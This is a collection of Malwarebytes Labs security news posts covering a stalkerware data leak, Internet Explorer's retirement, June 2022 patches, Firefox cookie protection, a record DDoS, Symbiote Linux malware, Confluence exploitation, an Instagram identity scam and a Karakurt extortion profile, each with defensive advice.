IT NEWS

Photos of kids taken from spyware-ridden phones found exposed on the internet

A stalkerware-type app that boasts “the best free phone spying software on the market,” has exposed the data it snooped on from the phones it was installed in. The data exposed by TheTruthSpy included GPS locations and photos on victims’ phones, and images of children and babies.

This news, first reported by Motherboard, is the latest in a lengthening list of spyware brands breached due to their poor cybersecurity hygiene. And TheTruthSpy is hardly the first of its kind to put kids’ data at risk.

The images exposed by TheTruthSpy were available to anyone who visited a particular URL on TheTruthSpy’s website. The photos included those of a young boy looking at the camera, a baby’s soiled diaper, a pet cat, and photos of the inside of someone’s home.

TheTruthSpy can be downloaded from the Google Play and Apple App stores. According to its website, it has 15+ features, including monitoring multiple communication apps, recording ambient voice, siphoning of photos, keylogging, and managing spying activities via a control panel. Any data retrieved from the target’s device is then uploaded to TheTruthSpy’s server, where clients can log in and view all collected data.

TheTruthSpy is maintained by 1Byte, a Vietnam-based company that handles multiple stalkerware-type apps. According to a Techcrunch exposé back in February, 1Byte was found exposing data from apps it manages due to a vulnerability in the app. It appears TheTruthSpy is suffering from the same flaw.

Stalkerware

Stalkerware is malicious in that it surreptitiously runs in the background while spying on people, usually without their knowledge.

Unlike other malware, it is also publicly available. Anyone with the means and intent can buy and use TheTruthSpy—all they need to do is download and install it onto target phones.

Not its first rodeo

This is the second time TheTruthSpy has had its data exposed. In 2018, a hacker going by the initials L.M. revealed to Motherboard his exploits in successfully infiltrating the stalkerware-type app’s servers to steal client data, and then later on losing it after it updated its servers.

“They take care about how to spy, and not take care about how they secure the attackers’ and victims’ privacy,” L.M. said at that time, criticizing TheTruthSpy for being untrue to its clients.

The post Photos of kids taken from spyware-ridden phones found exposed on the internet appeared first on Malwarebytes Labs.

It’s official, today you can say goodbye to Internet Explorer. Or can you?

Today, the Internet Explorer (IE) 11 desktop application goes out of support and will be retired for certain versions of Windows 10.

The retirement consists of two phases. During the first phase—the redirection phase—devices will be progressively redirected from IE to Microsoft Edge over the following months.

The second phase of retirement is the Windows Update phase. After the redirection phase completes, IE will be permanently disabled through a future Windows Update on all devices with Windows platforms that are in-scope for IE retirement.

History

Microsoft’s Internet Explorer 1.0 saw the first websites in August 1995. In 2003, Microsoft said goodbye to the standalone version of the browser, but Internet Explorer continued as a part of the evolution of the operating system, with updates coming bundled in operating system upgrades.

Over the following years, despite everything Microsoft tried, Chrome took over as the most used browser. With Windows 10, Edge became the default Microsoft browser, but Internet Explorer could still be found in the Windows Accessories folder.

While Edge started out based on Microsoft’s EdgeHTML browser engine, it later switched to a Chromium-based model.

After all this, Microsoft felt it was time to phase out Internet Explorer.

Platforms

For now the retirement is only partial, even for Windows 10. In scope at the time of this announcement.

Internet Explorer 11 desktop application delivered via the Semi-Annual Channel (SAC):

  • Windows 10 client SKUs
  • Windows 10 IoT

Out of scope at the time of this announcement (unaffected):

  • Internet Explorer mode in Microsoft Edge
  • Internet Explorer platform (MSHTML/Trident), including WebOC and COM automation
  • Internet Explorer 11 desktop application on:
    • Windows 8.1
    • Windows 7 Extended Security Updates (ESU)
    • Windows Server SAC (all versions)
    • Windows 10 IoT Long-Term Servicing Channel (LTSC) (all versions)
    • Windows Server LTSC (all versions)
    • Windows 10 client LTSC (all versions)
    • Windows 10 China Government Edition

In-market Windows 10 LTSC and Windows Server are also unaffected by this change. Windows Server 2022 and Windows 10 Enterprise LTSC 2021 are also out of scope.

The end

During the first phase, users will find themselves redirected from IE to Microsoft Edge. This will not happen for all devices at the same time, which gives organizations a chance to identify and resolve any potential issues, such as missed sites, before the redirection happens on all devices within an organization.

The second phase of retirement is the Windows Update phase. After the redirection phase completes, IE will be permanently disabled through a future Windows Update on all devices with Windows platforms that are in-scope for IE retirement.

Given the cumulative nature of Windows Updates, IE disablement will persist in subsequent Windows Updates.

For those that can’t wait to get rid of Internet Explorer, Microsoft has published a blog to explain how to move forward. It’s also worth reading for system administrators that want to prepare for the second phase of the retirement process.

Not so much

Why not uninstall IE entirely, you may wonder. This isn’t recommended as Internet Explorer mode relies on Internet Explorer 11 to function. IE mode on Microsoft Edge makes it easy to use all of the sites your organization needs in a single browser. It uses the integrated Chromium engine for modern sites, and it uses the Trident MSHTML engine from Internet Explorer 11 for legacy sites.

Support for IE mode follows the lifecycle of current and future Windows client, Windows server, and Windows IoT releases (including Windows 11) at least through 2029.

Security angle

While your first response to the news might have been a sigh of relief, the stage exit of Internet Explorer does not bring any immediate security improvements. The holy grail of backward compatibility has thrown a wrench in the Microsoft works before and it will probably continue to do so, as long as we are afraid to say goodbye to legacy technology in a decisive manner.

Switching to a more secure platform makes all kinds of sense, but it is held back if we keep on using the old, less secure platform on the side. Threat actors will prey on the old platform as long as it is in use.

Researchers will find vulnerabilities in Internet Explorer related files that need to stay on the system even if someone doesn’t use Internet Explorer anymore. And system administrators will find endpoint and/or users that need to keep Internet Explorer because there is some legacy resource that requires it.

The post It’s official, today you can say goodbye to Internet Explorer. Or can you? appeared first on Malwarebytes Labs.

Update now!  Microsoft patches Follina, and many other security updates

The June 2022 Patch Tuesday may go down in history as the day that Follina got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond.

Microsoft

Microsoft released updates to deal with 60 security vulnerabilities. Undoubtedly the most prominent one is the one that goes by the name of Follina. The Edge browser received five of the patched vulnerabilities .

Follina, or CVE-2022-30190

A quick recap about Follina. On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. An in the wild exploit was using a feature in Word to retrieve a HTML file from a remote server, and that HTML file in turn was using MSDT to load code and execute PowerShell commands.

CVE-2022-30136

Another critical vulnerability is CVE-2022-30136, a bug in NFS 4.1 which could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability concerns a number of Windows Server products and received a CVSS score of 9.8 out of 10. Last month, Microsoft fixed a similar vulnerability (CVE-2022-26937) affecting NFS v2.0 and v3.0.

CVE-2022-30139

Similar is CVE-2022-30139, a Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution (RCE) vulnerability. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. LDAP is a software protocol for enabling anyone to locate data about organizations, individuals and other resources such as files and devices in a network. LDAP is a “lightweight” (smaller amount of code) version of Directory Access Protocol (DAP). In total, seven vulnerabilities in LDAP were found and fixed.

CVE-2022-30163

Noteworthy as well is CVE-2022-30163 a Windows Hyper-V Remote Code Execution vulnerability that allows an attacker to run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code. Microsoft Hyper-V is a virtualization platform, which enables administrators to virtualize multiple operating systems to run off the same physical server simultaneously.

More Microsoft news

Microsoft has also started to phase out Internet Explorer, but more about that in a separate post.

And then there was a storm of criticism about the way Microsoft handled the SynLapse vulnerability in Azure Data Factory and Azure Synapse Pipelines. SynLapse is the name for a critical bug in Azure’s Synapse service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure. Rather than dealing with the vulnerability in a way that closed the gap once and for all, Microsoft choose what researchers called a halfhearted way that was easily bypassed in a following attempt. Orca researchers said they were able to bypass Microsoft’s fix for the issue twice before the company put a working fix in place.

Other vendors

Adobe has released security updates to address vulnerabilities in multiple products.

Atlassian released a patch for the in the wild exploited Confluence RCE vulnerability.

Citrix fixed two vulnerabilities in Citrix ADM server and Citrix ADM agent.

Drupal fixed two “Moderately critical” vulnerabilities.

GitLab released versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Google put out updates for Android and Chrome.

SAP published security notes about some high priority vulnerabilities

Stay safe, everyone!

The post Update now!  Microsoft patches Follina, and many other security updates appeared first on Malwarebytes Labs.

Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser”

Cookies are in the news as Mozilla rolls out significant privacy changes for Firefox. The idea is to dramatically lessen the risk of privacy-invading tracking across websites without your knowledge. Tracking cookies have been a hot topic in recent months, as advertisers try switching to other methods of tracking. Will this make a noticeable difference to people’s everyday browsing experience?

What are cookies?

Cookies are pieces of information which websites can save in your browser. Sites you visit can request your browser save cookies whenever the browser asks it for data. This can be pictures, downloads, page content, pretty much anything at all. The browser will keep the cookie and send it back to the website whenever requests are made until the cookie expires.

Expires? That’s right. Some cookies, called session cookies, expire once you close the browser. Others, persistent cookies, will remain on board until they eventually expire or you manually delete them. Humorously, some sites allow you to permanently opt-out of cookies and tracking by…asking you to accept permanent cookies which never expire.

Forget me not…but only sometimes

But how do these cookies, session or persistent, actually work?

Browsers and websites converse in a “stateless” fashion. Every message sent is isolated from all of the other messages. There’s no link to join any of these messages up, and that’s where cookies come into play. Cookies act like a sort of bridge for many day to day tasks inside your browser. Websites send browsers cookies, known as first party cookies, tied to a unique ID the first time they converse. The browser fires the unique ID back at the website as these messages continue to be sent.

Through this, the sites you use are able to keep you logged in, remember what you’ve done, and keep the site functional for your specific needs. While sites can read their own cookies, they can’t read cookies from other websites. This is where third-party cookies come into play.

Third party tracking: An advertiser’s dream

A first-party cookie on a website has been placed there by the website itself. A third-party cookie is being set by someone else, like an advertiser or ad network, via code embedded into the page. That cookie is designed to essentially follow you around the internet. This is why you start one day on a website offering up deals on movies you’re interested in, and then see adverts for those films at a cheaper price on another site the day after.

Slowly but surely, ad networks build up an incredibly accurate advertising profile of you as you move from one site to another. Depending on what’s being collected, you may end up with a huge slice of identifiable data tagged to your identity without you ever even seeing it yourself. It’s just there, and there’s not much you can do about it.

The cookie controversy

Third party cookies are not particularly popular. Ad tracking generally, even less so. Numerous questions of privacy and safety exist. Something else which exists: big fines. Not so long ago, Google and Facebook received fines for $157 million and $62 million respectively. This was for making cookies easier to accept than refuse.

Elsewhere, replacements of varying effectiveness have been proposed. Apple blocks default tracking everywhere. Google plans to ditch third party cookies in Chrome by the end of next year. Brave browser is already taking action against something called bounce tracking.

With all this in mind: What is Mozilla doing?

Hands off the cookie jar

Users of Firefox will now find something called Total Cookie Protection ticking along in the background. Mozilla claims that this release makes Firefox:

The most private and secure major browser available across Windows, Mac, and Linux. Total Cookie Protection is Firefox’s strongest privacy protection to date, confining cookies to the site where they were created, thus preventing tracking companies from using these cookies to track your browsing from site to site.

Total Cookie Protection creates individual “cookie jars” for every website you browse. Trackers are no longer able to thread that analytics picture across the web. What you get up to on one site stays on one site. As a result, tracking/advertising services can no longer watch from afar as you move from URL to URL. Your analytics profile is no longer quite as useful to advertisers as it once was.

Those cookies are still able to provide analytics in terms of the site they’re on. The difference is they’re no longer as invasive in terms of building a big picture of your internet activities.

This new stack of cookie jars is in addition to a number of other privacy features already up and running, including Enhanced Tracking Protection. Around since 2018, ETP blocks trackers from a maintained list. If a party is on the list, they lose the ability to use third-party cookies.

A cookie clean up

No matter which browser you use, an occasional cookie clean up is a good idea. Check out our post on removing cookies, which covers removal instructions for Chrome, Firefox, Edge, Opera, Safari, and several mobile browsers too.

The post Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser” appeared first on Malwarebytes Labs.

Record breaking HTTPS DDoS attack

Last week, Cloudflare blocked the largest HTTPS DDoS attack on record. The attack amassed some 26 million requests per second (rps). The previous record for a HTTPS DDoS attack was 15.3 million rps.

The attack targeted an unnamed Cloudflare customer and originated mostly from Cloud Service Providers.

DDoS over HTTPS

DDoS stands for Distributed Denial of Service. This type of attack involves sending large amounts of traffic from multiple sources to a service or website, intending to overwhelm it and make it inaccessible for regular users. DDoS attacks have been growing considerably in number and scale over the past years.

DDoS attacks require traffic to come from many sources. Large numbers can be found in IoT botnets, but given the necessary computational resources needed to pull off an attack this powerful, there is no IoT botnet strong enough. This attack originated from a small but powerful botnet of 5,067 devices. This and the fact that the attack originated from Cloud Service Providers indicates the use of hijacked virtual machines and powerful servers to generate the attack.

What makes the HTTPS DDoS attack more expensive, in terms of required computational resources, is the fact that such an attack requires a secure TLS encrypted connection. The advantage of using such a HTTPS DDoS attack is that it also costs the victim more to mitigate it.

The attack

Within less than 30 seconds, this botnet generated more than 212 million HTTPS requests from over 1,500 networks in 121 countries.

Even though 30 seconds is not that long, such an attack can disrupt an unprotected internet property like a network or online service for a long time. DDoS attacks can cripple some online businesses for a period of time long enough to set them back considerably, or even put them out of business completely for the length of the attack and some period afterwards.

Without knowing who the target was it is hard to guess at the reason behind the attack. Application-layer denial-of-service attacks disrupt web servers and other kinds of networked software by making them unable to process legitimate requests.

The goal usually is the disruption itself or to abuse the vulnerable state in which it leaves the internet property.

Good news

International cooperation between the Federal Bureau of Investigation (FBI), the United Kingdom National Crime Agency, and the Dutch Police has brought an end to a DDoS platform that gave threat actors short-term access to malicious infrastructure, enabling them to carry out damaging attacks by renting and selecting DDoS attacks they would like to launch. In this case an Illinois man running the websites DownThem.org and AmpNode.com was sentenced to 24 months in federal prison.

“Records from the DownThem service revealed more than 2,000 registered users and more than 200,000 launched attacks, including attacks on homes, schools, universities, municipal and local government websites, and financial institutions worldwide.”

The system was set up to use one or more of their own dedicated attack servers to appropriate the resources of hundreds or thousands of other servers connected to the internet in reflected amplification attacks.

A reflection amplification attack is a technique that allows attackers to both magnify the amount of malicious traffic they can generate and obscure the sources of the attack traffic.

Mitigation

Scrambling for a solution at the moment you find out that you are the target of a DDoS attack is not the best strategy, especially if your organization depends on internet-facing servers. Without an automated defense, the attack would very likely have ended even before you noticed. But the damage would have been done.

Ideally, you want to detect, identify, and mitigate DDoS attacks before they reach their target. You can do that through two types of defenses:

  • On-premise protection (e.g. identifying, filtering, detection, and network protection)
  • Cloud-based counteraction (e.g. deflection, absorption, rerouting, and scrubbing)

The best of both worlds is a hybrid solution that detects an attack on-premise early on and escalates to a cloud-based solution when it reaches a volume that the on-premise solution cannot handle.

Stay safe, everyone!

The post Record breaking HTTPS DDoS attack appeared first on Malwarebytes Labs.

Stealthy Symbiote Linux malware is after financial institutions

Symbiote, a new “nearly impossible to detect” Linux malware, targeted financial sectors in Latin America—and the threat actors behind it might have links to Brazil. These findings were revealed in a recent report, a joint effort between the Blackberry Research Team and Dr. Joakim Kennedy, a security researcher with Intezer.

Despite its name, this Trojan—first seen in November 2021—is more parasitic than a mutual benefactor in a symbiosis, according to Dr. Kennedy. And this is what sets Symbiote apart from other Linux malware.

“[I]t needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD (T1574.006), and parasitically infects the machine.

Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.”

This abuse of the environmental variable LD_PRELOAD appears to be the “LD_PRELOAD trick” described in this post. Since Symbiote is a shared object, the threat actor can set LD_PRELOAD to its path. In effect, this malformed file is loaded first before other shared objects. And because it’s loaded first, Symbiote can “hijack the imports” from other SO files.

This enables it to hide on infected Linux machines.

blackberry intezer symbiote eva
Symbiote’s evasion techniques (Source: Blackberry Threat Vector Blog)

Symbiote: the hows and whys of its ways

Once all processes have been infected, the Linux machine is as good as being infected. Symbiote then triggers its rootkit capabilities to hide, including other malware the threat actor may have dropped onto the device, processes, and network artifacts. This makes detection and active forensic examinations difficult.

Symbiote also offers threat actors a backdoor to the infected Linux machine, to which they can log in as a user with the highest privilege using a hardcoded password.

Per Dr. Kennedy, one exciting aspect Symbiote has is its Berkeley Packet Filter (BPF) hooking functionality. It does this to hide malicious traffic on an infected Linux machine. If you’re a threat actor, this is an excellent method when you don’t want to alert system admins of any network shenanigans on an infected Linux machine, as Symbiote can filter out such suspicious network traffic.

As a credential stealer, being stealthy is not an option.

“The malware’s objective, in addition to hiding malicious activity on the machine, is to harvest credentials and provide remote access for the threat actor. The credentials are first encrypted with RC4 using an embedded key, and then written to a file.

In addition to storing the credentials locally, the credentials are exfiltrated. The data is hex encoded and chunked up to be exfiltrated via DNS address record requests to a domain name controlled by the threat actor.”

The researchers further report that Symbiote impersonated Brazilian bank websites, suggesting Brazilians are the target of this campaign. The IP address of these domains is linked to the Njalla Virtual Private Server (VPS) service. Furthermore, “Passive DNS records showed that the same IP address was resolved to ns1[.]cintepol[.]link and ns2[.]cintepol[.]link a few months earlier.”

Cintepol is said to be the intelligence portal of the Federal Police of Brazil, which allowed its police officers to access intelligence from the federal police when investigating. This fake Cintepol site was abandoned in January 2022 in favor of another domain pointing to another Njalla VPS IP.

Protect against Symbiote

The threat actors behind Symbiote put a lot of effort into making it as under-the-radar as possible. However, Vulcan Cyber’s Mike Parkin, senior technical engineer, said in an interview with Dark Reading that the evasion tactics in Symbiote can still be detected by other network monitoring tools that can pinpoint malicious traffic and the infected Linux system.

Parkin further added that several endpoint tools should be able to identify malicious changes on infected systems.

“There are also forensic techniques that can use the malware’s own behavior against it to reveal its presence,” Parkin noted. “They leveraged a combination of techniques, though in so doing delivered some indicators of compromise that defenders could use to identify an infection in-situ.”

The Blackberry and Intezer report contains many indicators of compromise (IOCs) that IT admins should use to beef up the security of their Linux boxes.

You can also read our article on Malwarebytes’ EDR for Linux.

The post Stealthy Symbiote Linux malware is after financial institutions appeared first on Malwarebytes Labs.

Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs)

Malwarebytes is happy to announce our Vulnerability Assessment module for OneView, our multi-tenant console where you can manage Malwarebytes Nebula accounts, subscriptions, invoicing, and integrations. 

This module enables our MSPs to scan, identify, and assess vulnerabilities in customers’ digital ecosystems using our single lightweight agent.  

Here are some key benefits:

  • Automatically identify vulnerabilities via scheduled or manual scans
  • Deliver key insights and remediation steps for vulnerabilities; prioritized by severity level
  • Stay informed with customizable notifications when new vulnerabilities are discovered
  • Detailed vulnerability dashboards for a high-level view or all your customers

In this post, we’ll give you a step-by-step on how to complete an inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView.

Table of contents

Part 1: Selecting endpoints 

To conduct a vulnerability scan, start by clicking “Endpoints” in the left hand navigation bar. 

image5

Select the site or individual endpoints you wish to scan.

image12

Part 2: Scanning inventory and vulnerabilities

Once you have selected an endpoint, click the kebab menu in the upper right-hand corner. 

image19

Click “Scan Inventory & Vulnerability” in the middle.

image3

Click “Accept” in the confirmation window.

image11

Part 3: Viewing CVEs

We can see the results of our scan by clicking the “Vulnerabilities” tab.

image7

Selecting any of these CVEs will open a slide-out panel with more information. At the top, you’ll see remediation steps (most likely telling you to update to the latest version) and a link of references for further reading. 

Below, you’ll find a list of all the affected endpoints and applications. 

image2

Part 4: Scheduling a scan

You can also schedule a vulnerability scan to keep reports updated automatically. 

In this section, follow along with the screenshots to learn how to schedule a vulnerability scan.

image9
image4
image10
image16

Update the schedule type to “Software Inventory Scan”.

image17
image14

Select if this is a Global schedule or for a specific site. For this demo, we’ll choose Global.

image20
image13
image8
image1 1
image15
image18

Scan, identify, and assess customer vulnerabilities with Malwarebytes Vulnerability Assessment for OneView

We’ve given you a brief overview of how to check for (and schedule!) Common Vulnerabilities and Exposures (CVEs) using Malwarebytes Vulnerability Assessment for OneView.

Want to learn more about Malwarebytes Vulnerability Assessment for OneView? Read the data sheet.

The post Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs) appeared first on Malwarebytes Labs.

“Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft

Microsoft has warned that “multiple adversaries and nation-state actors” are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for CVE-2022-26134. It is essential users of Confluence address the patching issue immediately.

Confluence vulnerability: Background

At the start of June, researchers discovered a vulnerability in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a “critical unauthenticated remote code execution vulnerability”. It affected Confluence server and Confluence Data Center.

The attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for Persistent access on compromised web applications. The web server process and its child processes ran as root and full privileges. This is very bad news, and allowed for execution of commands even without valid credentials.

Worse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn’t the kind of thing admins discovering an attack want to hear mid-investigation.

Unfortunately, mitigation advice was somewhat limited. It veered between restricting access to just turning off Confluence Server and Data Center instances. On June 3, Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.

The current situation

Here’s the latest observations from Microsoft:

Microsoft continues:

In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware.

A mixed bag of attacks

Industrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. AvosLocker Ransomware and Linux botnets are getting in on the action. Cryptomining jumping on the bandwagon is an inevitability across most scams we see, and this is no exception.

Microsoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record observed that Cerber2021 is a “relatively minor player”, with both Windows and Linux versions used to lock up machines. Here’s an example of the ransomware, via MalwareHunterTeam:

Having the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.

If you don’t want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the Confluence Download Archives and patch immediately.

The post “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft appeared first on Malwarebytes Labs.

Instagram scam steals your selfies to trick your friends

What would you do if a friend of yours set up a NSFW account, and then used it to follow you on Instagram? Would you check it out?

We recently learned of a group of friends who had to ask themselves exactly that. Fortunately, they realised that something was off. The account wasn’t the real owner’s, it just used her identity and left her with a mess to clean up.

A scammer's Instagram profile using a stolen ID
A scam “NSFW” profile using safe-for-work pictures stolen from a legitimate account

We learned about the scam from Malwarebytes’ former social media guru, Amanda, who was one of its targets. She graciously allowed us to use her screenshots in this article in the interests of teaching others about the scam.

It started with Amanda’s real Instagram account, her name, her pictures, and her followers. The scammers used them to create a simple “NSFW” Instagram account designed to look like it belonged to her, and then tried to lure her friends into visiting it by following them.

Friends who checked out the new account saw a face they recognised in a context they didn’t: An Instagram account that promised it’s “NOT SAFE FOR WORK” and “FOR YOUR EYES ONLY”. The public account had no posts, just a story with another stolen picture and a caption urging visitors to “VISIT MY PROFILE ON NAKED SITE”, where they were promised access to a limited number of slots for “exclusive content”. The profile included the URL of a Wix.com website that described itself as “my secret account”.

Scammers know that their websites are unlikely to stay up for long before being blocked, so services like Wix that make it easy to create professional-looking sites quickly, for free, are used to create “burner” websites that are here today and gone tomorrow.

The site featured another photo stolen from Amanda’s Instagram account as its profile picture, surrounded by NSFW and pornographic stock art.

Of course, this wasn’t a “secret account”, there were no “FREE LIVE SHOWS”, and there was no “private content”. In fact there was barely a site. There was just enough to lure in anybody whose curiosity had got the better of their critical thinking skills.

A Wix-based scam website using a stolen ID
A Wix “burner” website using a stolen profile picture

Click on a link (any link at all) and you’d end up at a different domain, at an unbranded “age verification” page hungry for an email, username, and password, so you could “JOIN NOW”.

If you’d found yourself here and wondered why it looks nothing like the site you started on, the clue is in the URL: The long SID parameter is likely an affiliate code. This tells the owner of this site which affiliate sent the traffic here (and who they should pay for providing it). The affiliate stole Amanda’s identity to get you here, but the owners of this site may not know about that, and may not care.

Eagle-eyed readers will also have noticed that an email, username, and password don’t say anything about how old you are, and this rabbit hole didn’t end here.

An "age verification" website asks for a username and password
An unbranded age verification page

What the scammers really wanted, all they ever wanted, was your credit card number. Underneath the bold “Free Verification” banner, the small print reveals what this is really all about—tricking people into joining expensive subscription services.

Your access to Nightly Encounter includes a 2 day free trial promo to Locating Someone Special Nearby. If you choose to remain a member of Locating Someone Special Nearby beyond the trial period, your membership will renew at thirty nine ninety nine.

Fortunately for us, a fake credit card was enough to get us through the door and explore a bit further without rewarding the scammers.

A "Free verification" page
The “Free Verification” page wants your credit card details

If you’d got this far, the scammers would have known a number of very important pieces of information about you. Your ID and credit card details, obviously, but also something else that’s valuable too—that you are willing to hand those things over.

And if they got you to do it once, why not try to do it again?

Handing over your credit card wouldn’t get you to the long-ago promised NSFW content starring your friend, or even Nightly Encounter or Locating Someone Special Nearby, whatever they are.

Instead, you’d find yourself on a different site, entering yet another username, password and email into a different “Secure Billing Platform” so another affiliate gets paid for serving you up on a platter.

"Secure billing platform"
Yet another “secure billing platform”

Your reward? Another request for your credit card details, for another subscription you didn’t need.

At this point (and to no small relief) our fake credit card details lost their magical powers of persuasion and would couldn’t go any further.

The "Secure Billing Platform" asks for credit card details
The end of the road

It’s not unusual for victims to double down as doubts start to creep in, and the scammers are ready to squeeze every last penny, and every last vestige of hope, from their victims.

If you are the victim of an ID theft like this, report the scam accounts and sites to the platforms operating them. The Instagram account used in this scam is gone and, to its huge credit, Wix removed the scam site within literal seconds of being alerted to it.

If photos you own are used without your permission then the scammer has violated your copyright. You can take action by filling in a DMCA takedown form.

Unfortunately we can’t offer you much for the shock and alarm of finding your public persona twisted by scammers in search of a few affiliate dollars, but you have our sympathy.

The post Instagram scam steals your selfies to trick your friends appeared first on Malwarebytes Labs.

Karakurt extortion group: Threat profile

The FBI (Federal Bureau of Investigation), together with CISA (Cybersecurity and Infrastructure Security Agency) and other federal agencies, recently released a joint cybersecurity advisory (CSA) about the Karakurt data extortion group (also known as Karakurt Team and Karakurt Lair).

Like RansomHouse, Karakurt doesn’t bother encrypting data. Instead, it just steals the data and demands a ransom. If the victim organization refuses to pay up, the stolen data is auctioned off or leaked to the public for anyone to scrape and misuse for personal gain.

One may wonder why federal agencies decided to focus on Karakurt when it is a relatively obscure group. It has no prolific attacks attributed to it and doesn’t appear to have a high number of attacks under its belt.

According to Bleeping Computer, Karakurt is said to be the “data extortion arm” of the Conti ransomware syndicate. Further evidence from two blockchain traffic firms, Chainalysis and Tetra Defense, can back this up. In a report last month, they assessed “with a high degree of confidence” that Karakurt is “operationally linked to both Conti and Diavol ransomware groups”.

Karakurt extortion group

karakurt logo

The Karakurt group got its name from a type of black widow spider. Researchers have pointed out that the group liken its extortion tactics to a karakurt spider’s bite.

itemeditorimage 6258765ac1f9e
Screenshot of a section of the group’s “blurb” on its dark web leak page
(Source: Arctic Wolf)
Karakurts poison is very toxic and dangerous. Don't waste your time.
What would you do? Of course you will have to take an antidote.
In your situation it means that you still have a chance to survive. But it will cost as double.
All you need is to accept our terms and conditions without any sort of bargain.

The NCC Group’s Cyber Incident Response Team (CIRT) spotlighted Karakurt activities in February 2022. However, Karakurt, known initially as the Karakurt Hacking Team (KHT), has been around since June 2021. This also marked the creation of domains and accounts associated with the group, namely its dump sites and, later on, its Twitter account in August 2021.

Per a report from Accenture Security, Karakurt wasn’t actively extorting until September 2021. After two months, the extortion group had already bagged 40 organizations across multiple industries. However, experts from Digital Shadows seem to dispute this number, claiming that the victim number is more than 80.

Regarding victimization, it’s clear that Karakurt isn’t picky with what to target. Regarding target locations, the extortion group prefers small organizations based in the US, the UK, Canada, and Germany.

The extortion group targets organizations using single-factor Fortigate VPN (Virtual Private Network) servers using legitimate Active Directory credentials. It is unknown how the group obtains these credentials; however, it’s no surprise that they get administrative access and privileges on compromised servers.

From there, Karakurt can use the various tools it has at its disposal. Depending on the goals, the group can do a “living off the land” approach in its tactics, toolset, and intrusion techniques. It can also use common post-exploit tools like Cobalt Strike, AnyDesk, and Mimikatz.

Once Karakurt has the data it wants to exfiltrate, it uses 7zip and WinZip to compress the files before sending them to Mega.io via FileZilla or Rclone.

mwb karakurt home page wm
Karakurt’s home page

Karakurt demands a ransom ranging from $25,000 to $13M in Bitcoin. The payment deadline is typically seven days after the victim contacts the extortion group.

Splintering into cells

Ransomware groups have been undergoing a new phase for a few months now. If they’re not splitting into smaller groups (“cells”) to join other criminal groups, they are rotating their use of malware to avoid the growing US sanctions and pressure from law enforcement.

Since the US officially sanctioned Evil Corp, the Russian group behind the Dridex banking Trojan, things started changing, both on the side of ransomware victims and affiliates that use ransomware. Victims began refusing to pay to comply with sanctions, and these groups started rotating the use of ransomware variants in their campaigns to avoid getting associated with a sanctioned group.

With Conti “gone,” a splintering also happened within the syndicate. Researchers from Advanced Intel have data showing members of the former ransomware syndicate dispersing from the core group to join smaller ransomware groups.

Conti is not affiliated with Evil Corp, but both groups are in a similar bind that affects their profit margins but not enough to make them completely give up a criminal life. Unfortunately, members and affiliates gain from splintering and distancing themselves from these groups.

In an interview with the Wall Street Journal, Kimberly Goody, Mandiant’s director of cybercrime analysis, said that these changes obscured Evil Corp hackers’ identities “at the point of attack, throwing off investigators and sanction-compliant victim companies”. The same can be said about former actors associated with the Conti syndicate.

Keep Karakurt away from your network and data

We advise organizations to prioritize mitigating steps to keep extortion groups like Karakurt from successfully infiltrating your network. Here are some ways to do that.

  • Implement multi-factor authentication (MFA) in every business access point, including single-factor VPN access
  • Ensure that all domain control servers are kept updated with the latest patches
  • Disable unused ports
  • Install an efficient and effective endpoint security solution that focuses on a layered approach to protecting systems and business assets
  • Create and implement a recovery plan (if your business doesn’t have one already), including how to maintain and retain backups
  • Segment your network to keep bad guys from reaching destinations that house your organization’s most sensitive and proprietary data
  • Audit high-privileged accounts regularly

The federal agencies have more mitigation points in the advisory, which you can find here.

Stay safe!

The post Karakurt extortion group: Threat profile appeared first on Malwarebytes Labs.